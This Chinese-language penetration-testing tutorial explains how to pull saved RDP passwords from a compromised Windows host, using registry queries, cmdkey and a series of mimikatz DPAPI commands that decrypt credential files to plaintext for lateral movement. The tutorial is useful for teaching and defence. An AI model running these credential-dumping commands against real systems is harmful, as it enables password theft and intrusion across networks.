[内网]RDP远程桌面密码凭证获取

这篇具有很好参考价值的文章主要介绍了[内网]RDP远程桌面密码凭证获取。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

在授权渗透过程中,如果获取了一台windows的权限,可以尝试去获取该主机保存的远程桌面连接凭证,从而在内网横向中扩大成果。
也就是当我们获取一台windows服务器,可以尝试获取本地远程连接的信息
甚至可以拿到明文密码,横向移动。

RDP保存凭据

通过rdp服务登录远程桌面时,如果选择了记住凭证,会在本地生成一个凭证文件,我们只要破解这个凭证里面的数据即可获得明文密码。
[内网]RDP远程桌面密码凭证获取

通过注册表查看当前主机本地连接过的目标机器记录

reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /s

[内网]RDP远程桌面密码凭证获取

查看当前主机保存的RDP凭据

cmdkey /list

[内网]RDP远程桌面密码凭证获取

查看本地用户是否存有RDP密码文件

dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*

[内网]RDP远程桌面密码凭证获取
这些文件默认是隐藏的,需要关闭隐藏
[内网]RDP远程桌面密码凭证获取
[内网]RDP远程桌面密码凭证获取
[内网]RDP远程桌面密码凭证获取
[内网]RDP远程桌面密码凭证获取
这里只看4.28号的文件:B0B07C74251019634D3D975E183A4D01

通过密码文件获取guidMasterKey的值

选择密码文件,使用mimikatz对其文件进行解密,并记录下guidMasterKey的值
需要对应修改路径和文件名:
C:\Users\xuanjian\AppData\Local\Microsoft\Credentials\B0B07C74251019634D3D975E183A4D01

mimikatz.exe "privilege::debug" "dpapi::cred /in:C:\Users\xuanjian\AppData\Local\Microsoft\Credentials\B0B07C74251019634D3D975E183A4D01" exit

[内网]RDP远程桌面密码凭证获取
guidMasterKey的值为:{667e9c69-1d5d-4f18-aad2-04437c5c03c5}
需要记下这个guidMasterKey的值

根据guidMasterKey找到对应Masterkey

根据guidMasterKey,使用mimikatz找到对应的Masterkey

mimikatz.exe "privilege::debug" "sekurlsa::dpapi" exit > 1.txt

[内网]RDP远程桌面密码凭证获取
获得MasterKey:0541b84285d48012015ae28a75935a53eedcca0423d74e9c34c10a82c6991015f371097e61bc6d927e82a80bbdb0cdcd1e00431a7f93e65a209b7150f80c1eba

解密获取明文

通过MasterKey,使用mimikatz解密pbData数据,获取RDP连接明文密码

mimikatz.exe "privilege::debug" "dpapi::cred /in:C:\Users\xuanjian\AppData\Local\Microsoft\Credentials\B0B07C74251019634D3D975E183A4D01 /masterkey:0541b84285d48012015ae28a75935a53eedcca0423d74e9c34c10a82c6991015f371097e61bc6d927e82a80bbdb0cdcd1e00431a7f93e65a209b7150f80c1eba" exit

获取用户名密码
[内网]RDP远程桌面密码凭证获取文章来源地址https://www.toymoban.com/news/detail-501595.html

以上总结:

  1. 通过密码文件获取guidMasterKey的值,
  2. 根据guidMasterKey找到对应Masterkey
  3. 通过Masterkey进行解密,获取明文

到了这里,关于[内网]RDP远程桌面密码凭证获取的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 获取rdp保存的凭证

    当获取到一台windows服务器,可以尝试获取本地远程连接的信息,如果用户在登入rdp时勾选了 允许为我保存凭证的选项,则在该用户本地会生成一个凭证文件,我们只需要破解该凭证文件即可获取其明文密码。 通过注册表 查看 注册表信息,获取rdp的计算机用户名,ip信息 通

    2024年02月06日
    浏览(44)
  • 利用mimikatz查看rdp连接密码【渗透测试】

    0x00 概述 在使用 rdp 时会发现系统有保存连接密码的功能,一定在本地以一种加密方式保存,在连接的时候解密进行rdp尝试,那么我们能不能那到加密的密码解密以获取这台机器rdp连接过的机器呢? 0x01 流程 “AppDataLocalMicrosoftCredentialsXXX”  -- GUID(guidMasterKey)  -- 通过 sek

    2024年02月05日
    浏览(46)
  • Ubuntu-22.04通过RDP协议连接远程桌面

    提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 由于一些特殊需要,我需要通过远程桌面连接到Ubuntu-22.04。在Ubuntu-20.04和Ubuntu-18.04我都是通过VNC协议连接的,体验上只能说中规中矩吧,能用的水平。今天偶然发现Ubuntu-22.04居然支持RDP了,抑制不住兴奋

    2024年02月08日
    浏览(40)
  • Nginx使用 代理转发Windows远程桌面RDP功能

    一、业务需求 B是服务器192.168.31.200,A电脑192.168.31.100是跳板机,只有A这台电脑可以远程桌面访问B服务器。现在需要通过一台远程这台跳板机,间接实现对服务器B的远程访问。 二、配置nginx 在A电脑上安装Nginx,配置文件添加如下配置项: 注意:如果有多个stream模块需要设置

    2024年02月15日
    浏览(65)
  • 微信小程序:登录授权,根据手机号获取凭证,获取用户手机号

    1.微信小程序授权 controller 层代码 wxUtils 工具类 2.微信小程序,用户手机号获取 微信小程序,根据code(code为手机号获取凭证)获取用户加密手机号 获取用户手机号方法

    2024年02月14日
    浏览(65)
  • windows server2019数据中心桌面版多远程桌面RDP方案

    Windows Server 默认远程桌面连接数是2个用户,如果多于两个用户进行远程桌面连接时,系统会提示需要挤掉一个用户的连接。如果需要实现多用户远程登录则需要通过添加远程桌面授权或者修改底层代码。 安装以下服务 打开远程桌面服务,点击rd授权管理器 激活服务器 访问上

    2024年02月16日
    浏览(49)
  • 获取RDP凭据密码

    Windows 自带的远程桌面功能非常强大,并且被广泛使用。因此,获取远程桌面凭证可以为渗透测试中的横向移动提供有利条件。横向移动是指在已经渗透到网络内部的情况下,继续在网络内部渗透的过程。通过获取远程桌面凭证,攻击者可以在网络内部移动,以获取更高的权

    2024年02月06日
    浏览(42)
  • 域内密码凭证获取

    Volume Shadow Copy 活动目录数据库 ntds.dit:活动目录数据库,包括有关域用户、组和成员身份的 信息。它还包括域中所有用户的哈希值。 ntds.dit文件位置:%SystemRoot%NTDSNTDS.dit system文件位置:%SystemRoot%System32configSystem sam文件位置:%SystemRoot%System32configSAM %SystemRoot%是系统安装

    2024年02月15日
    浏览(46)
  • Jenkins | 获取凭证密码

    目录 方法一:查看所有账号及密码 方法二:查看指定账号密码 Jenkins == 系统管理 == 脚本命令行 直接运行后看下面的输出即可: 按 F12 后获取这段加密后的密码: 然后继续去执行脚本:  完成

    2024年02月16日
    浏览(42)
  • 从远程桌面客户端提取明文凭证的工具RdpThief

    导语:在本文中,我将描述我编写的一个工具,能使用API钩子从Microsoft RDP客户端提取明文凭据,而且如果是在已经受感染用户的权限下操作(比如网络钓鱼导致),并且该用户已打开RDP会话,则可以提取明文凭据而无需提权。 远程桌面(RDP)是用于管理Windows Server的最广泛使

    2024年02月02日
    浏览(56)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包